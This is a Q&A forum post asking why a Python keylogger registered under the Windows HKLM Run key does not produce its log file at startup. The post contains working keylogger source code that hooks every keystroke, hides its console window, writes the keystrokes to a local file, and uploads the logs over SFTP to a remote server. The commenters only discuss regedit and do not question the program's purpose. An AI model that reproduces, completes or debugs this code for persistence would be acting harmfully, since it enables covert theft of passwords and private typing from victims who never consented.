# Regedit starting program, but not working properly

Tags: python, windows-7, py2exe, regedit, keylogger

I am trying to make my keylogger program start up at boot time. I put it in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" through regedit. When I open Task Manager, it is in the processes list, but I am not finding the text file it logs to. I am aware of the directory it is in. When I manually start the program, it is there. I am running a 64-bit Windows Ultimate version. I compiled the file to a single executable. This is the script:

```
try:
    import pythoncom, pyHook
except:
    print "Please Install pythoncom and pyHook modules"
    exit(0)
import os
import sys
import threading
import urllib,urllib2
import smtplib
import ftplib
import datetime,time
import win32event, win32api, winerror
from _winreg import *


#Disallowing Multiple Instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    print "Multiple Instance not Allowed"
    exit(0)
x=''
data=''
count=0


#Hide Console
def hide():
    import win32console,win32gui
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window,0)
    return True


#Local Keylogger
def local():
    global data
    if len(data)>100:
        fp=open("keylogs.txt","a")
        fp.write(data)
        fp.close()
        data=''
    return True


#Upload logs to FTP account
def ftp():
    global data,count
    if len(data)>100:
        count+=1
        FILENAME="logs-"+str(count)+".txt"
        fp=open(FILENAME,"a")
        fp.write(data)
        fp.close()
        data=''
        try:
            FILENAME="logs-"+str(count)+".txt"
            fp=open(FILENAME,"a")
            fp.write(data)
            fp.close()
            OUTPUT_DIR="/home/"+FILENAME
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect('', username='', password='')
            ftp = ssh.open_sftp()
            ftp.put(FILENAME, OUTPUT_DIR)
            ftp.close()
        except Exception as e:
            print e
    return True

def main():
    global x
    x=1
    hide()
    return True

if __name__ == '__main__':
    main()

def keypressed(event):
    global x,data
    if event.Ascii==13:
        keys='<ENTER>'
    elif event.Ascii==8:
        keys='<BACK SPACE>'
    elif event.Ascii==9:
        keys='<TAB>'
    else:
        keys=chr(event.Ascii)
    data=data+keys 
    if x==1:  
        local()
    elif x==2:
        remote()
    elif x==4:
        ftp()

obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard()
pythoncom.PumpMessages()
```

I have compiled the script to exe with py2exe and pyinstaller with the same results. I also tried putting it in the Startup folder with no luck. The script does not need any administrative rights. I have tried disabling UAC, but no luck their either.

Comment: Regedit is only a utility to edit register files, it doesn't starts anything.

Comment: Yes to edit the register files I am using Regedit for windows. There is a place for listing executables and scripts to start on boot.